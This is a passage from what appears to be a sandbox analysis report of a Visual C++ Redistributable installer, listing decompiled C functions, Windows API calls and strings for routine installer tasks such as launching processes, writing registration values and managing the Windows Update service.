                                                                          						if(_v40.hThread != 0) {
                                                                          							CloseHandle(_v40.hThread);
                                                                          							_v40.hThread = 0;
                                                                          						}
                                                                          						if(_v40.hProcess != 0) {
                                                                          							CloseHandle(_v40);
                                                                          						}
                                                                          						return _t102;
                                                                          					}
                                                                          				}
                                                                          			}


















                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001BB82
                                                                          • CreateProcessW.KERNEL32 ref: 0001BC8F
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0001BC99
                                                                          • WaitForInputIdle.USER32 ref: 0001BCED
                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 0001BD38
                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 0001BD45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                          • String ID: "%ls"$"%ls" %s$@Met$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                          • API String ID: 155678114-407875378
                                                                          • Opcode ID: 3d2a972f3430d61cd254c882117d73d424ca3d0016b2040cf14b5c67fac93e1e
                                                                          • Instruction ID: 043ff4db845901893ab1466f0006cb9cb5cf4498ca896ef82b9aba52a590f8d3
                                                                          • Opcode Fuzzy Hash: 3d2a972f3430d61cd254c882117d73d424ca3d0016b2040cf14b5c67fac93e1e
                                                                          • Instruction Fuzzy Hash: 71518C72D0061ABBDF11AFA4CC82DEEBBB9FF04305F004169FA04B6121D775AE949B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E0001EBB2(signed int _a4, intOrPtr* _a8, signed int* _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				void* _v20;
                                                                          				intOrPtr* _t44;
                                                                          				signed int _t48;
                                                                          				signed int _t68;
                                                                          				intOrPtr _t70;
                                                                          				signed int _t74;
                                                                          				void* _t75;
                                                                          				signed int _t77;
                                                                          				signed int _t78;
                                                                          				intOrPtr* _t79;
                                                                          				intOrPtr* _t83;
                                                                          				signed int _t85;
                                                                          				signed int _t88;
                                                                          
                                                                          				_t74 = 0;
                                                                          				_v20 = 0;
                                                                          				_t85 = 0;
                                                                          				_v8 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				if(E00053803(_a4, L"SoftwareTag",  &_v20) >= 0) {
                                                                          					_t44 = _v20;
                                                                          					_t84 =  &_v16;
                                                                          					_push( &_v16);
                                                                          					_push(_t44);
                                                                          					if( *((intOrPtr*)( *_t44 + 0x20))() >= 0) {
                                                                          						_t77 = _v16;
                                                                          						if(_t77 == 0) {
                                                                          							L22:
                                                                          							_t88 = _t74;
                                                                          							 *_a12 = _t77;
                                                                          							 *_a8 = _t85;
                                                                          							_t85 = _t74;
                                                                          						} else {
                                                                          							_t85 = E000138D4(_t77 << 4, 1);
                                                                          							if(_t85 != 0) {
                                                                          								_t77 = _v16;
                                                                          								_a4 = 0;
                                                                          								if(_t77 == 0) {
                                                                          									goto L22;
                                                                          								} else {
                                                                          									_t13 = _t85 + 8; // 0x8
                                                                          									_t75 = _t13;
                                                                          									while(1) {
                                                                          										_t88 = E00053760(_t77, _v20,  &_v8, 0);
                                                                          										if(_t88 < 0) {
                                                                          											break;
                                                                          										}
                                                                          										_t16 = _t75 - 8; // 0x0
                                                                          										_t88 = E000531C7(_v8, L"Filename", _t16);
                                                                          										if(_t88 < 0) {
                                                                          											_push("Failed to get @Filename.");
                                                                          											goto L2;
                                                                          										} else {
                                                                          											_t18 = _t75 - 4; // 0x4
                                                                          											_t88 = E000531C7(_v8, L"Regid", _t18);
                                                                          											if(_t88 < 0) {
                                                                          												_push("Failed to get @Regid.");
                                                                          												goto L2;
                                                                          											} else {
                                                                          												_t88 = E000531C7(_v8, L"Path", _t75);
                                                                          												if(_t88 < 0) {
                                                                          													_push("Failed to get @Path.");
                                                                          													goto L2;
                                                                          												} else {
                                                                          													_t88 = E000533C8(_v8,  &_v12);
                                                                          													if(_t88 < 0) {
                                                                          														_push("Failed to get SoftwareTag text.");
                                                                          														goto L2;
                                                                          													} else {
                                                                          														_t24 = _t75 + 4; // 0xc
                                                                          														_t88 = E00012436(_t84, _t24, _v12, 0, 0xfde9);
                                                                          														if(_t88 < 0) {
                                                                          															_push("Failed to convert SoftwareTag text to UTF-8");
                                                                          															goto L2;
                                                                          														} else {
                                                                          															_t68 = _v12;
                                                                          															if(_t68 != 0) {
                                                                          																__imp__#6(_t68);
                                                                          																_v12 = _v12 & 0x00000000;
                                                                          															}
                                                                          															_t83 = _v8;
                                                                          															if(_t83 != 0) {
                                                                          																 *((intOrPtr*)( *_t83 + 8))(_t83);
                                                                          																_v8 = _v8 & 0x00000000;
                                                                          															}
                                                                          															_t75 = _t75 + 0x10;
                                                                          															_t77 = _v16;
                                                                          															_t70 = _a4 + 1;
                                                                          															_a4 = _t70;
                                                                          															if(_t70 < _t77) {
                                                                          																continue;
                                                                          															} else {
                                                                          																_t74 = 0;
                                                                          																goto L22;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L23;
                                                                          									}
                                                                          									_push("Failed to get next node.");
                                                                          									goto L2;
                                                                          								}
                                                                          							} else {
                                                                          								_t88 = 0x8007000e;
                                                                          								E000137D3(_t55, "registration.cpp", 0x40c, 0x8007000e);
                                                                          								_push("Failed to allocate memory for software tag structs.");
                                                                          								goto L2;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get software tag count.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to select software tag nodes.");
                                                                          					L2:
                                                                          					_push(_t88);
                                                                          					E0005012F();
                                                                          				}
                                                                          				L23:
                                                                          				_t48 = _v12;
                                                                          				if(_t48 != 0) {
                                                                          					__imp__#6(_t48);
                                                                          				}
                                                                          				_t78 = _v8;
                                                                          				if(_t78 != 0) {
                                                                          					 *((intOrPtr*)( *_t78 + 8))(_t78);
                                                                          				}
                                                                          				_t79 = _v20;
                                                                          				if(_t79 != 0) {
                                                                          					 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                                          				}
                                                                          				if(_t85 != 0) {
                                                                          					E00013999(_t85);
                                                                          				}
                                                                          				return _t88;
                                                                          			}




















                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001ED40
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001ECF8
                                                                          Strings
                                                                          • Filename, xrefs: 0001EC73
                                                                          • Failed to get next node., xrefs: 0001EDA7
                                                                          • Failed to allocate memory for software tag structs., xrefs: 0001EC3F
                                                                          • Failed to get @Regid., xrefs: 0001ED93
                                                                          • Path, xrefs: 0001ECA6
                                                                          • Failed to get software tag count., xrefs: 0001EC07
                                                                          • Regid, xrefs: 0001EC8E
                                                                          • Failed to get SoftwareTag text., xrefs: 0001ED7F
                                                                          • SoftwareTag, xrefs: 0001EBC1
                                                                          • registration.cpp, xrefs: 0001EC35
                                                                          • Failed to get @Path., xrefs: 0001ED89
                                                                          • Failed to convert SoftwareTag text to UTF-8, xrefs: 0001ED75
                                                                          • Failed to select software tag nodes., xrefs: 0001EBE2
                                                                          • Failed to get @Filename., xrefs: 0001ED9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeHeapString$AllocateProcess
                                                                          • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
                                                                          • API String ID: 336948655-1068704183
                                                                          • Opcode ID: bbabe2392e8ad8db74017f6ecdcacccc376246153b3483eda9b59665b70cf999
                                                                          • Instruction ID: c8b2425fc36fd2e633bb160446fe85963d97e8634a36122468241dc9f086bcb5
                                                                          • Opcode Fuzzy Hash: bbabe2392e8ad8db74017f6ecdcacccc376246153b3483eda9b59665b70cf999
                                                                          • Instruction Fuzzy Hash: 5851B135A05369ABDB259F94D891EEFBBA5AF04750F140169FD02EB241CB71DE808B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E0001F410(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _t59;
                                                                          				char* _t60;
                                                                          				void* _t64;
                                                                          				void* _t72;
                                                                          
                                                                          				_t57 = __edx;
                                                                          				_t54 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t59 = _a4;
                                                                          				_t64 = E0001E7CD(__ecx, _t59,  &_v12);
                                                                          				if(_t64 >= 0) {
                                                                          					_t64 = E00050A88( *((intOrPtr*)(_t59 + 0x4c)), _v12, 0x20006,  &_v8);
                                                                          					if(_t64 >= 0) {
                                                                          						if(E00051392(__ecx, __edx, _v8, L"ThisVersionInstalled", "Y") >= 0) {
                                                                          							if(E00051392(__ecx, __edx, _v8, L"PackageName",  *((intOrPtr*)(_t59 + 0x60))) >= 0) {
                                                                          								if(E00051392(_t54, __edx, _v8, L"PackageVersion",  *((intOrPtr*)(_t59 + 0x64))) >= 0) {
                                                                          									if(E00051392(_t54, __edx, _v8, L"Publisher",  *((intOrPtr*)(_t59 + 0x68))) >= 0) {
                                                                          										_t40 =  *((intOrPtr*)(_t59 + 0xa4));
                                                                          										if( *((intOrPtr*)(_t59 + 0xa4)) == 0) {
                                                                          											L16:
                                                                          											_t60 = L"ReleaseType";
                                                                          											if(E00051392(_t54, _t57, _v8, _t60,  *((intOrPtr*)(_t59 + 0xb0))) >= 0) {
                                                                          												_t61 = _a8;
                                                                          												if(E0001EDB1(_t54, _t57, _v8, _a8, L"LogonUser", L"InstalledBy") >= 0) {
                                                                          													if(E0001EDB1(_t54, _t57, _v8, _t61, L"Date", L"InstalledDate") >= 0) {
                                                                          														_t72 = E0001EDB1(_t54, _t57, _v8, _t61, L"InstallerName", L"InstallerName");
                                                                          														if(_t72 >= 0) {
                                                                          															_t72 = E0001EDB1(_t54, _t57, _v8, _t61, L"InstallerVersion", L"InstallerVersion");
                                                                          															if(_t72 < 0) {
                                                                          																_push(L"InstallerVersion");
                                                                          																goto L26;
                                                                          															}
                                                                          														} else {
                                                                          															_push(L"InstallerName");
                                                                          															goto L26;
                                                                          														}
                                                                          													} else {
                                                                          														_push(L"InstalledDate");
                                                                          														goto L26;
                                                                          													}
                                                                          												} else {
                                                                          													_push(L"InstalledBy");
                                                                          													goto L26;
                                                                          												}
                                                                          											} else {
                                                                          												_push(_t60);
                                                                          												goto L26;
                                                                          											}
                                                                          										} else {
                                                                          											_t72 = E00051392(_t54, _t57, _v8, L"PublishingGroup", _t40);
                                                                          											if(_t72 >= 0) {
                                                                          												goto L16;
                                                                          											} else {
                                                                          												_push(L"PublishingGroup");
                                                                          												goto L26;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										_push(L"Publisher");
                                                                          										goto L26;
                                                                          									}
                                                                          								} else {
                                                                          									_push(L"PackageVersion");
                                                                          									goto L26;
                                                                          								}
                                                                          							} else {
                                                                          								_push(L"PackageName");
                                                                          								goto L26;
                                                                          							}
                                                                          						} else {
                                                                          							_push(L"ThisVersionInstalled");
                                                                          							L26:
                                                                          							_push("Failed to write %ls value.");
                                                                          							_push(_t72);
                                                                          							E0005012F();
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to create the key for update registration.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get the formatted key path for update registration.");
                                                                          					L2:
                                                                          					_push(_t64);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          					_v8 = _v8 & 0x00000000;
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				return _t72;
                                                                          			}










                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00020348,InstallerVersion,InstallerVersion,00000000,00020348,InstallerName,InstallerName,00000000,00020348,Date,InstalledDate,00000000,00020348,LogonUser), ref: 0001F5BE
                                                                            • Part of subcall function 00051392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,0A79F685,00000000,0A79F685,000000FF,00000000,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006), ref: 000513C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                          • API String ID: 3132538880-2703781546
                                                                          • Opcode ID: cadd5bfdac0afacee3b079bc886b7da7cab0dc5ab325932df533323c17d2b32f
                                                                          • Instruction ID: c88d468486dec64937384e6b2230fe7e74e12b97aa80846b7307dc1e38375d46
                                                                          • Opcode Fuzzy Hash: cadd5bfdac0afacee3b079bc886b7da7cab0dc5ab325932df533323c17d2b32f
                                                                          • Instruction Fuzzy Hash: 7D419631A80E67BBDB225A50CC02EFF7A67AB11B11F114270FF01BB292D7619E949680
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E0003678F(intOrPtr _a4, void** _a8, intOrPtr* _a12) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v32;
                                                                          				struct _SERVICE_STATUS _v36;
                                                                          				char _v40;
                                                                          				intOrPtr* _v44;
                                                                          				void** _v48;
                                                                          				void* _v52;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t23;
                                                                          				void* _t29;
                                                                          				intOrPtr _t33;
                                                                          				void* _t35;
                                                                          				signed short _t48;
                                                                          				signed short _t51;
                                                                          				signed short _t54;
                                                                          				void* _t58;
                                                                          				signed int _t59;
                                                                          				void* _t70;
                                                                          				short* _t71;
                                                                          				signed int _t81;
                                                                          
                                                                          				_t23 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t23 ^ _t81;
                                                                          				_t59 = 7;
                                                                          				_v48 = _a8;
                                                                          				_t71 = 0;
                                                                          				_v44 = _a12;
                                                                          				_v40 = 0;
                                                                          				memset( &_v36, 0, _t59 << 2);
                                                                          				_t29 = OpenSCManagerW(0, 0, 0xf003f);
                                                                          				_v52 = _t29;
                                                                          				if(_t29 != 0) {
                                                                          					_t58 = OpenServiceW(_t29, L"wuauserv", 0x27);
                                                                          					if(_t58 != 0) {
                                                                          						if(QueryServiceStatus(_t58,  &_v36) != 0) {
                                                                          							_t33 = _v32;
                                                                          							if(_t33 != 1 && _a4 != 0) {
                                                                          								_t71 = E000369A8(_t58, _t58);
                                                                          								_t33 = _v32;
                                                                          							}
                                                                          							if(_t33 == 4) {
                                                                          								L17:
                                                                          								 *_v48 = _t58;
                                                                          								_t58 = 0;
                                                                          							} else {
                                                                          								_t71 = E000557BF(0, _t58,  &_v40);
                                                                          								if(_t71 >= 0) {
                                                                          									if( *((intOrPtr*)(_v40 + 4)) != 4) {
                                                                          										goto L17;
                                                                          									} else {
                                                                          										_t71 = E00036945(_t58, 3);
                                                                          										if(_t71 >= 0) {
                                                                          											 *_v44 = 1;
                                                                          											goto L17;
                                                                          										} else {
                                                                          											_push("Failed to mark WU service to start on demand.");
                                                                          											goto L2;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to read configuration for WU service.");
                                                                          									goto L2;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t48 = GetLastError();
                                                                          							_t74 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							_t71 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "msuengine.cpp", 0x1bf, _t71);
                                                                          							_push("Failed to query status of WU service.");
                                                                          							goto L2;
                                                                          						}
                                                                          					} else {
                                                                          						_t51 = GetLastError();
                                                                          						_t77 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          						_t71 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "msuengine.cpp", 0x1bb, _t71);
                                                                          						_push("Failed to open WU service.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t54 = GetLastError();
                                                                          					_t80 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          					_t71 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "msuengine.cpp", 0x1b8, _t71);
                                                                          					_push("Failed to open service control manager.");
                                                                          					L2:
                                                                          					_push(_t71);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v40 != 0) {
                                                                          					E00013999(_v40);
                                                                          				}
                                                                          				_t70 = CloseServiceHandle;
                                                                          				if(_t58 != 0) {
                                                                          					CloseServiceHandle(_t58);
                                                                          				}
                                                                          				_t35 = _v52;
                                                                          				if(_t35 != 0) {
                                                                          					CloseServiceHandle(_t35);
                                                                          				}
                                                                          				return E0003DE36(_t58, _v8 ^ _t81, 0, _t70, _t71);
                                                                          			}



























                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00036CE1,?), ref: 000367C8
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 000367D5
                                                                          • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 0003681D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 00036829
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 00036863
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 0003686D
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00036924
                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 0003692E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                          • String ID: @Met$Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuuser.cpp$wuauserv
                                                                          • API String ID: 971853308-1642282992
                                                                          • Opcode ID: a33338e81be9343d65ace41e1bb04cb2bacfb5633a841e9de3931021fca18279
                                                                          • Instruction ID: 22cac9cd8cd571950666ae957141c74a99b1fce54fb303e21632e20bd52dab3b
                                                                          • Opcode Fuzzy Hash: a33338e81be9343d65ace41e1bb04cb2bacfb5633a841e9de3931021fca18279
                                                                          • Instruction Fuzzy Hash: 7A419171F00314BBEB229BA98C45AAF76EDEF48751F118526FD05FB281DA36DC0086A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E0003C517(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _t121;
                                                                          				intOrPtr _t176;
                                                                          				intOrPtr* _t190;
                                                                          				intOrPtr* _t197;
                                                                          				intOrPtr _t198;
                                                                          				intOrPtr _t203;
                                                                          				signed int _t206;
                                                                          				intOrPtr _t207;
                                                                          				intOrPtr _t208;
                                                                          				signed int _t209;
                                                                          				signed int _t210;
                                                                          				signed int _t212;
                                                                          				void* _t214;
                                                                          				void* _t220;
                                                                          				signed int _t223;
                                                                          				intOrPtr* _t224;
                                                                          				void* _t225;
                                                                          
                                                                          				_t193 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t190 = _a24;
                                                                          				_t121 = E000138D4( *(_t190 + 0x80) << 3, 1);
                                                                          				_t212 = _a4;
                                                                          				 *((intOrPtr*)(_t212 + 0x7c)) = _t121;
                                                                          				if(_t121 != 0) {
                                                                          					_t206 = 0;
                                                                          					 *(_t212 + 0x80) =  *(_t190 + 0x80);
                                                                          					_a4 = 0;
                                                                          					if( *(_t190 + 0x80) <= 0) {
                                                                          						L16:
                                                                          						 *(_t212 + 0x14) =  *(_t212 + 0x14) & 0x00000000;
                                                                          						 *((intOrPtr*)(_t212 + 0xa8)) = 1;
                                                                          						 *((intOrPtr*)(_t212 + 0x8c)) =  *((intOrPtr*)(_t190 + 0x8c));
                                                                          						 *((intOrPtr*)(_t212 + 0x40)) =  *((intOrPtr*)(_t190 + 0x40));
                                                                          						 *((intOrPtr*)(_t212 + 0x44)) =  *((intOrPtr*)(_t190 + 0x44));
                                                                          						 *((intOrPtr*)(_t212 + 0x28)) =  *((intOrPtr*)(_t190 + 0x28));
                                                                          						 *((intOrPtr*)(_t212 + 0x2c)) =  *((intOrPtr*)(_t190 + 0x2c));
                                                                          						 *((intOrPtr*)(_t212 + 0x30)) =  *((intOrPtr*)(_t190 + 0x30));
                                                                          						 *((intOrPtr*)(_t212 + 0x34)) =  *((intOrPtr*)(_t190 + 0x34));
                                                                          						 *((intOrPtr*)(_t212 + 0x1c)) =  *((intOrPtr*)(_t190 + 0x1c));
                                                                          						if(E000121A5(_t212,  *_t190, 0) >= 0) {
                                                                          							_t97 = _t212 + 0x24; // 0x124
                                                                          							if(E000121A5(_t97,  *((intOrPtr*)(_t190 + 0x24)), 0) >= 0) {
                                                                          								 *((intOrPtr*)(_t212 + 0xb0)) =  *((intOrPtr*)(_t190 + 0xb0));
                                                                          								if(E00027C29(_t193,  &_v8,  *_a8,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(_a8 + 8)),  *((intOrPtr*)(_a8 + 0x1c)), 1, _a16, _a20, _a12,  *((intOrPtr*)(_t135 + 0xc))) >= 0) {
                                                                          									_t109 = _t212 + 0x94; // 0x194
                                                                          									if(E000121A5(_t109, _v8, 0) >= 0) {
                                                                          										_t112 = _t212 + 0x98; // 0x198
                                                                          										_t220 = E000121A5(_t112, _v8, 0);
                                                                          										if(_t220 >= 0) {
                                                                          											_t114 = _t212 + 0x9c; // 0x19c
                                                                          											 *((intOrPtr*)(_t212 + 0xac)) = 1;
                                                                          											_t220 = E000121A5(_t114, _v8, 0);
                                                                          											if(_t220 >= 0) {
                                                                          												 *((intOrPtr*)(_t212 + 0x18)) = 1;
                                                                          											} else {
                                                                          												_push("Failed to copy uninstall arguments for passthrough bundle package");
                                                                          												goto L23;
                                                                          											}
                                                                          										} else {
                                                                          											_push("Failed to copy related arguments for passthrough bundle package");
                                                                          											goto L23;
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to copy install arguments for passthrough bundle package");
                                                                          										goto L23;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to recreate command-line arguments.");
                                                                          									goto L23;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to copy cache id for passthrough pseudo bundle.");
                                                                          								goto L23;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to copy key for passthrough pseudo bundle.");
                                                                          							goto L23;
                                                                          						}
                                                                          					} else {
                                                                          						while(1) {
                                                                          							_t223 = _t206 << 3;
                                                                          							_a24 =  *((intOrPtr*)(_t190 + 0x7c)) + _t223;
                                                                          							 *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c)))) = E000138D4(0x58, 1);
                                                                          							_t150 =  *((intOrPtr*)(_t212 + 0x7c));
                                                                          							_t207 =  *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c))));
                                                                          							if(_t207 == 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t197 = _a24;
                                                                          							 *((intOrPtr*)(_t207 + 4)) =  *((intOrPtr*)( *_t197 + 4));
                                                                          							_t198 =  *_t197;
                                                                          							_t208 =  *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c))));
                                                                          							 *((intOrPtr*)(_t208 + 0x10)) =  *((intOrPtr*)(_t198 + 0x10));
                                                                          							 *((intOrPtr*)(_t208 + 0x14)) =  *((intOrPtr*)(_t198 + 0x14));
                                                                          							_t220 = E000121A5( *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c)))),  *((intOrPtr*)( *_a24)), 0);
                                                                          							if(_t220 < 0) {
                                                                          								_push("Failed to copy key for passthrough pseudo bundle payload.");
                                                                          								goto L23;
                                                                          							} else {
                                                                          								_t220 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _a4 * 8)) + 0x18,  *((intOrPtr*)( *_a24 + 0x18)), 0);
                                                                          								if(_t220 < 0) {
                                                                          									_push("Failed to copy filename for passthrough pseudo bundle.");
                                                                          									goto L23;
                                                                          								} else {
                                                                          									_t220 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _a4 * 8)) + 0x38,  *((intOrPtr*)( *_a24 + 0x38)), 0);
                                                                          									if(_t220 < 0) {
                                                                          										_push("Failed to copy local source path for passthrough pseudo bundle.");
                                                                          										goto L23;
                                                                          									} else {
                                                                          										_t224 = _a24;
                                                                          										_t173 =  *_t224;
                                                                          										if( *((intOrPtr*)( *_t224 + 0x40)) == 0) {
                                                                          											L12:
                                                                          											_t174 =  *_t224;
                                                                          											if( *((intOrPtr*)( *_t224 + 0x30)) == 0) {
                                                                          												L15:
                                                                          												_t209 = _a4;
                                                                          												_t193 =  *((intOrPtr*)(_t212 + 0x7c));
                                                                          												 *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + 4 + _t209 * 8)) =  *((intOrPtr*)(_t224 + 4));
                                                                          												_t206 = _t209 + 1;
                                                                          												_a4 = _t206;
                                                                          												if(_t206 <  *(_t190 + 0x80)) {
                                                                          													continue;
                                                                          												} else {
                                                                          													goto L16;
                                                                          												}
                                                                          											} else {
                                                                          												_t176 = E000138D4( *((intOrPtr*)(_t174 + 0x34)), 0);
                                                                          												_t210 = _a4;
